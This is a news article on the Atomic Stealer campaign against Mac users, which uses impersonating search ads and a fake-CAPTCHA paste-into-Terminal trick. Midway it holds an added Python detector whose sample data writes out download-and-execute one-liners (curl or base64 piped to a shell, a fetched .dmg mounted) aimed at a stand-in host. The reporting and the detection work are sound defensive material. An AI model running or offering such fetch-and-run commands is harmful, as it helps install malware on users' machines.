Here’s how potent Atomic credential stealer is finding its way onto Macs

https://arstechnica.com/security/2025/09/potent-atomic-credential-stealer-can-bypass-gatekeeper/

Dan Goodin Sep 22, 2025 · 2 mins read

Ads prominently displayed on search engines are impersonating a wide range of online services in a bid to infect Macs with a potent credential stealer, security companies have warned. The latest reported target is users of the LastPass password manager.

Late last week, LastPass said it detected a widespread campaign that used search engine optimization to display ads for LastPass macOS apps at the top of search results returned by search engines, including Google and Bing. The ads led to one of two fraudulent GitHub sites targeting LastPass, both of which have since been taken down. The pages provided links promising to install LastPass on MacBooks. In fact, they installed a macOS credential stealer known as Atomic Stealer, also called Amos Stealer.

Dozens targeted

“We are writing this blog post to raise awareness of the campaign and protect our customers while we continue to actively pursue takedown and disruption efforts, and to also share indicators of compromise (IoCs) to help other security teams detect cyber threats,” LastPass said in the post.

LastPass is hardly alone in seeing its well-known brand exploited in such ads. The indicators of compromise LastPass provided listed other impersonated software and services, including 1Password, Basecamp, Dropbox, Gemini, Hootsuite, Notion, Obsidian, Robinhood, Salesloft, SentinelOne, Shopify, Thunderbird, and TweetDeck. Typically, the ads offer the software in prominent fonts. When clicked, the ads lead to GitHub pages that install versions of Atomic disguised as the official software being falsely advertised.

The malicious pages sometimes deliver the stealer as a downloadable file in Apple's .dmg disk image format. After Apple added a detection to Gatekeeper—the malware protection built into macOS that blocks the installation of known malware—attackers started using a new method that bypassed it. This method masqueraded as a CAPTCHA, ostensibly to prove the user wasn’t a bot, by requiring the user to copy a text string and paste it into the Mac Terminal window. In reality, the string was a command that downloaded and installed the malicious .dmg without any intervention from Gatekeeper. Researchers have warned of this Gatekeeper-bypassing technique for at least the past 20 months.
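The paste-into-Terminal lure described above leaves a trace a defender can look for in shell history or process-execution telemetry. The following is an added example, not code from the article, LastPass, or any of the vendors it cites: a small Python scan over constructed sample command lines that flags the download-and-execute chains such a pasted string typically contains. The sample commands, rule names and the example.invalid URLs are all made up for illustration.

```python
import re

# Constructed sample of shell commands, as a shell-history collector or EDR
# might record them. None of these are real Atomic Stealer commands; the
# base64 string decodes to a harmless "curl ... example.invalid ... | sh".
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    "echo 'Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC94IHwgc2g=' | base64 -d | sh",
    "brew install wget",
    "curl -o /tmp/Installer.dmg https://example.invalid/Installer.dmg && "
    "hdiutil attach /tmp/Installer.dmg && open /Volumes/Installer/Installer.app",
    "git pull",
]

DOWNLOADERS = r"(?:curl|wget)\b"
SHELLS = r"(?:sh|bash|zsh)\b"

# Heuristics for a pasted one-liner that fetches and runs code without the
# browser download path that would normally attach the quarantine flag
# Gatekeeper relies on. Each rule is a regular expression over one command.
RULES = {
    # curl/wget output piped straight into an interpreter
    "download_piped_to_shell": re.compile(rf"{DOWNLOADERS}.*\|\s*(?:sudo\s+)?{SHELLS}"),
    # an encoded blob decoded and piped into an interpreter
    "base64_decoded_to_shell": re.compile(
        rf"base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:sudo\s+)?{SHELLS}"),
    # a disk image fetched from the command line and mounted in the same step
    "downloaded_dmg_mounted": re.compile(rf"{DOWNLOADERS}.*\.dmg.*\bhdiutil\s+attach\b"),
}


def classify(command):
    """Return the names of every rule a single command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(command)]


def scan(commands):
    """Return (command, [rule names]) for each command that triggers a rule."""
    hits = []
    for cmd in commands:
        rules = classify(cmd)
        if rules:
            hits.append((cmd, rules))
    return hits


if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_COMMANDS):
        print(f"{', '.join(rules)}: {cmd}")
```

Legitimate tooling (Homebrew's own installer, for one) also uses curl-piped-to-shell, so treat a hit as a triage lead to pair with the user's browser history and the downloaded host, not as a verdict on its own.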

Despite attempts to raise awareness about Atomic, attackers have continued to use it widely, an indication that it remains effective. The post linked immediately above reports it being used against users of Homebrew, a tool that’s indispensable for many developers of macOS-compatible apps.

People should download software only from links provided on a site’s official webpage. In the event they view an ad and decide they want to install the app being promoted, they should open a new tab and visit the official website directly, rather than clicking on the download link in the ad. More information about Atomic is available here and here.